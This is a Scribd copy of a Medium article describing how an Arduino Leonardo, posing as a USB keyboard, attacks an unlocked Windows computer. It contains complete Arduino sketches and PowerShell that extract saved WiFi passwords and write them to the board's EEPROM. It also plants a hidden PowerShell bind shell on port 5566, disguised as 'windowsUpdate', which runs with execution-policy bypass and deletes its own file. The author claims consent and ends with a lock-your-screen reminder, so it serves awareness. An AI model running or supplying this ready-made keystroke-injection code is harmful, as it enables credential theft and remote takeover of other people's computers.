Scribd
Upload
33 views15 pages

Hacking A Computer Using Arduino.

The document summarizes how an Arduino Leonardo microcontroller board can be used to hack an unlocked computer by masquerading as a keyboard and extracting WiFi passwords. It introduces Arduino basics and shows code for a sketch that uses buttons to trigger extracting WiFi passwords from the computer using PowerShell commands, saving them to the Arduino's memory, and then dumping the data to another computer when the button is pressed again.

Uploaded by

Elijah Payne
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
33 views15 pages

Hacking A Computer Using Arduino.

The document summarizes how an Arduino Leonardo microcontroller board can be used to hack an unlocked computer by masquerading as a keyboard and extracting WiFi passwords. It introduces Arduino basics and shows code for a sketch that uses buttons to trigger extracting WiFi passwords from the computer using PowerShell commands, saving them to the Arduino's memory, and then dumping the data to another computer when the button is pressed again.

Uploaded by

Elijah Payne
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 15

12/21/22, 5:16 PM Hacking a computer using Arduino.

Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

Open in app Sign up Sign In

Published in CSG @ GovTech

Kang Hao Follow

Jul 22, 2020 · 9 min read · Listen

Save

Hacking a computer using Arduino


Imagine this scenario…

Video title: This is what happens when you leave your school computer unlocked for too long.

You get the picture — In this article, I will explain how I hacked into someone’s
computer that was left unlocked while s/he was on a quick toilet break. [Caveat: I
have asked his/her permission before hacking the computer and returned the
computer to its original status once the hacking was done] However, there was only
21 1

https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 1/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

so much that I could do in such a short time. To speed up the hacking process, I
created my very own Rubber Ducky USB using Arduino.

Introduction to Arduino
Arduino is both a micro-controller and micro-controller kit that enables you to
control hardware devices using C, a programming language. There are many
different types of Arduino, each with their unique attributes. For example, Arduino
Uno is considered one of the most popular Arduino boards due to its low price and
its basic suite of functionalities.

This article focuses on the Arduino Leonardo, a micro-controller board based on


the ATmega32u4, with a built-in USB communication. This feature enables it to
disguise itself as a keyboard or a mouse connected to the computer. I have tried
other Arduinos, such as Nano and Uno, but they are unable to fool the computer.

Arduino Leonardo

For this demo, I set up two buttons with specific functions. The left button would
trigger the function to “masquerade” as a keyboard, and concurrently send
keystrokes at incredible speeds and capture data. The right button would discharge
the captured data to the computer that I am using for the attack.

First, let me introduce the hardware components of the Arduino Leonardo and
demonstrate basic Arduino controls on the micro-controller and micro-controller
kit.

All Arduino boards consist of a setup function and a loop function.

Setup function
https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 2/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

This function executes only once whenever the Arduino is powered up.

Loop function
This function runs continuously upon the execution of the setup function.

I noticed that the buttons are connected to pin 2 and pin 3 respectively in the circuit
board (left) diagram. Thus, I defined pinMode(2, INPUT); and pinMode(3, INPUT);
as INPUT components in the sketch (right). The loop function is where I defined the
execution of our function.

Attack 1: Steal WiFi password


Whenever a computer connects to a WiFi connection, the WiFi password is stored
in the system. This is good news as I could leverage the PowerShell command to
obtain a list of WiFi Service Set Identifiers (SSIDs) with passwords.

#include <Keyboard.h>
#include <EEPROM.h>
char stringArray[500] = {""};
boolean extracted = false, dispatched = false;
int extractButton = 2, dispatchButton = 3;

void setup() { Serial.begin(9600);


https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 3/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

pinMode(extractButton, INPUT);
pinMode(dispatchButton, INPUT);
Keyboard.begin();
}
void loop() {
if(digitalRead(extractButton) == HIGH && !extracted) {
extractingData();
extracted = true;
}
if(digitalRead(dispatchButton) == HIGH && !dispatched) {
dispatchingData();
dispatched = true;
} if(digitalRead(extractButton) == LOW)
extracted = false;
if(digitalRead(dispatchButton) == LOW)
dispatched = false;
}

void extractingData() {
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.print("Powershell");
delay(500);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.println("(netsh wlan show profiles) | Select-String
\"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %
{(netsh wlan show profile name=\"$name\" key=clear)} | Select-
String \"Key Content\\W+\\:(.+)$\" | %
{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{
PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-
String -OutVariable dataCaptured");
delay(500);

Keyboard.println("$comPort = ((Get-WmiObject -query \"SELECT *


FROM Win32_PnPEntity\" | Where {$_.Name -Match
\"COM\\d+\"}).name).Split(\"COM\")");
delay(200);
Keyboard.println("$comPort = [int]$comPort[$comPort.length -
1].replace(\")\", \"\")");
delay(200);
Keyboard.print("$serialObject = new-Object
System.IO.Ports.SerialPort COM");
Keyboard.print("$comPort");
Keyboard.println(", 9600, None, 8, one");
delay(200);
Keyboard.println("$serialObject.Open()");
delay(200);
Keyboard.println("$serialObject.Write(\"$dataCaptured\")");
delay(200);
https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 4/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

Keyboard.println("$serialObject.close()");
delay(200);
Keyboard.println("exit");
delay(200);
for(int i=0; i<sizeof(stringArray)-1; i++)
stringArray[i] = Serial.read();
EEPROM.put(1, stringArray);
}

void dispatchingData() {
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.println("notepad");
delay(700);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print(EEPROM.get(1, stringArray));
}

Attack Summary
1. First, I connect the Arduino Leonardo to the victim’s computer through the USB
port. Remember the two buttons earlier? When the left button is triggered, the
program launches the PowerShell terminal and begins inputting commands.

2. The program then extracts the WiFi’s SSIDs along with its passwords and saves it
to the Arduino’s Electrically Erasable Programmable Read-only Memory
(EEPROM). As it is a non-volatile flash memory device, stored information is
retained even when it is no longer powered.

3. After the Arduino has executed its functions, I unplug it from the victim’s
computer and connect it to my own. This time, I trigger the right button which
causes Arduino to dump data that has been stored in the EEPROM into my
computer.

WiFi SSID Display Command

(netsh wlan show profiles) |


Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim();
$_} |
%{(netsh wlan show profile name="$name" key=clear)} |
https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 5/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

Select-String "Key Content\W+\:(.+)$" |


%{$pass=$_.Matches.Groups[1].Value.Trim(); $_} |
%{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} |
Format-Table –AutoSize |
Out-String -OutVariable dataCaptured

This is scary!
While we can do this manually, why not use our favourite Arduino to help us?

The WiFi SSID display command is lengthy and difficult to understand. In the next
part of this article, I will break down the command into a few digestible sections to
make it easier to understand the function of the code.

Understanding the command

Section A
This section of the command displays the cached SSID and filters the string with “\:
(.+$” as a regular expression.

(netsh wlan show profiles) | Select-String "\:(.+)$" | %


{$name=$_.Matches.Groups[1].Value.Trim();

List of saved SSID

Section B

https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 6/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

%{(netsh wlan show profile name="$name" key=clear)}

I call the netsh wlan function again to obtain more information about the SSIDs.
Notice that I use the $name variable which I retrieved from the previous pipe?

Section C
Here, I extract the Key Content (password) and assign it to a $pass variable.

Select-String "Key Content\W+\:(.+)$" | %


{$pass=$_.Matches.Groups[1].Value.Trim(); $_}

https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 7/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

Section D
Finally, I create a PS Object with Profile Name and Password attributes that are
displayed in a table format and write to the $dataCaptured.

%{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-


Table –AutoSize | Out-String -OutVariable dataCaptured

Saving data to the EEPROM command


To write data to our Arduino, the two devices — computer and Arduino — must
interact using serial communication. Serial communication is the process of
transmitting data one bit at a time, over a communication channel or USB. Each
port is identified by COM1, COM2, COM3, COM4, and so on. Each COM represents
an input/output (I/O) and an interrupt request (IRQ) address. The I/O address
transfers and receives data to and from a peripheral device such as a mouse or
keyboard. The speed of the Serial Communication or ‘baud rate’ is measured in bits
per second. In this demo, I used 9600 bits per second.

# Search for available COM port


$comPort = ((Get-WmiObject -query "SELECT * FROM Win32_PnPEntity" |
Where {$_.Name -Match "COM\d+"}).name).Split("COM");
$comPort = [int]$comPort[$comPort.length - 1].replace(")", "");

# Connect to COM port and begin writing data


$serialObject = new-Object System.IO.Ports.SerialPort COM$comPort ,
9600, None, 8, one;
$serialObject.Open();
$serialObject.Write("$dataCaptured");

Once the data is transmitted, I disconnect the Arduino from the victim’s computer
and connect it to my computer. I then trigger the right button to begin the
dispatching process, where the captured data is transferred to my notepad.

https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 8/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

Attack 2: Pop a shell


At this point, you must be thinking: Why stop at stealing our victim’s WiFi SSID and
password when we can obtain more information? In this section, let me show you
how to pop a shell.

#include <Keyboard.h>
#include <EEPROM.h>

char stringArray[50] = {""};


boolean extracted = false, dispatched = false;
int extractButton = 2, dispatchButton = 3;
void setup() {
Serial.begin(9600);
pinMode(extractButton, INPUT);
pinMode(dispatchButton, INPUT);
Keyboard.begin();
}
void loop() {
if(digitalRead(extractButton) == HIGH && !extracted) {
shell();
extracted = true;
}
if(digitalRead(dispatchButton) == HIGH && !dispatched) {
ipaddr();
dispatched = true;
}
if(digitalRead(extractButton) == LOW)
extracted = false;
if(digitalRead(dispatchButton) == LOW)
dispatched = false;
}

void shell() {
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.print("cmd");
delay(500);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.println("set updateSource=\"function
windowsUpdate{$stream=$client.GetStream();
[byte[]]$bytes=0..65535^|^%{0};$sendbytes=
([text.encoding]::ASCII).GetBytes('Running as user '+$env:username+'
on
'+$env:computername+'.');$stream.Write($sendbytes,0,$sendbytes.Lengt
h);$sendbytes=([text.encoding]::ASCII).GetBytes('PS '+(Get-

https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 9/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

Location).Path+'^>');$stream.Write($sendbytes,0,$sendbytes.Length);w
hile(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0)
{$EncodedText=New-Object -TypeName
System.Text.ASCIIEncoding;$data=$EncodedText.GetString($bytes,0,$i);
try{$sendback=(IEX -Command $data 2^>^&1 ^| Out-String
);}catch{}$sendback2 = $sendback + 'PS ' + (Get-Location).Path +
'^> ';$x = ($error[0] ^|Out^-String);$error.clear();$sendback2 =
$sendback2 + $x;$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyt
e,0,$sendbyte.Length);$stream.Flush();}$client.Close();if($listener)
{$listener.Stop();}}$listener=
[System.Net.Sockets.TcpListener]5566;$listener.start();rm
update.ps1;$client=$listener.AcceptTcpClient();windowsUpdate\"");
delay(500);

Keyboard.println("echo %updateSource:~1,1014%>update.ps1");
delay(200);
Keyboard.println("powershell -ep bypass -windowstyle hidden -
file update.ps1");
delay(500);

Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.print("Powershell");
delay(500);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.println("Get-NetIPAddress -AddressFamily IPv4 -
suffixorigin dhcp|select ipaddress|Out-String -OutVariable d");
delay(200);
Keyboard.println("$c=((Get-WmiObject -query \"SELECT * FROM
Win32_PnPEntity\"|Where{$_.Name -Match
\"COM\\d+\"}).name).Split(\"COM\")");
delay(200);
Keyboard.println("$c=[int]$c[$c.length-1].replace(\")\",\"\")");
delay(200);
Keyboard.print("$s=new-Object System.IO.Ports.SerialPort COM");
Keyboard.print("$c");
Keyboard.println(",9600,None,8,one");
delay(200);
Keyboard.println("$s.Open()");
delay(200);
Keyboard.println("$s.Write(\"$d\")");
delay(200);
Keyboard.println("$s.close()");
delay(200);
Keyboard.println("exit");
delay(200);

for(int i=0; i<sizeof(stringArray)-1; i++)


stringArray[i] = Serial.read();
https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 10/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

EEPROM.put(1, stringArray);
}
void ipaddr() {
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.println("notepad");
delay(700);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print(EEPROM.get(1, stringArray));
}

The code above may look complicated, so let us break it down into steps:

1. After connecting the Arduino to the victim’s computer, I trigger the left button.

2. The program launches the command prompt, where it creates a command


prompt variable, namely updateSource, that stores the PowerShell shellcode.

3. After which, the program creates a PowerShell script update.ps1 that has the
value of updateSource written into it.

4. Lastly, the program executes the command prompt code powershell -ep bypass
-windowstyle hidden -file update.ps1. This ensures that the update.ps1
program will run in the background.

5. Before ending the exploit, the program launches PowerShell once again and the
victim’s IP address is written into the EEPROM. This is similar to the WiFi
dispatching of the password described earlier.

6. I disconnect the Arduino from the victim’s computer and connected it to mine.
This time, I trigger the right button to unload the victim’s IP address.

7. I conclude the attack by performing a netcat connection to establish the bind


shell.

Here’s a cleaned up version of the shell code:

https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 11/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

#Function for shell


function windowsUpdate {
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | %{0};
$sendbytes = ([text.encoding]::ASCII).GetBytes('Running as user
'+$env:username+' on '+$env:computername+'.');

$stream.Write($sendbytes, 0, $sendbytes.Length);
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-
Location).Path + '>');

$stream.Write($sendbytes, 0, $sendbytes.Length);

while (($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0) {


$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding;
$data = $EncodedText.GetString($bytes,0,$i);

try {
#Receive command from the attacker
$sendback=(IEX -Command $data 2 >&1 | Out-String );
}
catch {}

$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ';


$x = ($error[0] | Out-String);
$error.clear();
$sendback2 = $sendback2 + $x;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}

$client.Close();
if ($listener) {
$listener.Stop();
}
}

#Listening for connection


$listener = [System.Net.Sockets.TcpListener] 5566;
$listener.start();

#Remove update.ps1 here!


rm update.ps1;

$client = $listener.AcceptTcpClient();

#Invoke function
windowsUpdate;

To summarise, the program has created a function that constructs a bind shell on
port 5566 that is available to anybody who connects to it. The program also deletes
the update.ps1 file while waiting for incoming connection. At this point, I connect
https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 12/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

to the bind shell function and begin controlling the victim’s computer. Isn’t this easy
powershell scripting?

DEMO TIME
Here are some interesting videos on the demo:

Injecting shell code to the victim and extracting the IP address

Arduino Bind Shell (1/2)

Dispatching the IP address and controlling the victim’s computer

https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 13/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

Arduino Bind Shell (2/2)

There are many ways to break the news to our unsuspecting victims. Here is a cheat
sheet of what you can do:

# Send keystroke to the victim's computer


$wshell = New-Object -ComObject wscript.shell;
$wshell.sendKeys(" ");
$wshell.sendKeys("Hahaha");

# Write to file
echo You have been hacked! > hacked.txt

# Open file with notepad


notepad hacked.txt

# Close browser
taskkill /IM firefox.exe /F
taskkill /IM chrome.exe /F

# Open tab with URL for firefox


cd "C:\Program Files\Mozilla Firefox"
firefox.exe https://www.google.com/

# Open tab with URL for chrome


cd "Path\To\Chrome"
chrome.exe https://www.google.com/

Summary
https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 14/16
12/21/22, 5:16 PM Hacking a computer using Arduino. Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

In this article, I have shared with you some of Arduino’s basic functions and
introduced EEPROM, serial communication, USB Rubber Ducky, and a little on
PowerShell scripting.

As the hacking processes run in the background, victims will not be able to detect if
their computers have been hacked. To mitigate potential risks of having your
computer hacked — my dear colleagues included — always remember to lock your
computer when you are away from your desk.

Remember, cybersecurity starts with YOU!

References:

electronicsOrSomething/ArduinoWifiHacker
Program for Grabbing/Writing Wifi passwords. Contribute to
electronicsOrSomething/ArduinoWifiHacker development by…
github.com

samratashok/nishang
By nikhil_mitt Import all the scripts in the current PowerShell session
(PowerShell v3 onwards). PS C:\nishang>…
github.com

Cybersecurity Csg Govtech Usb Rubber Ducky Arduino

About Help Terms Privacy

https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 15/16

You might also like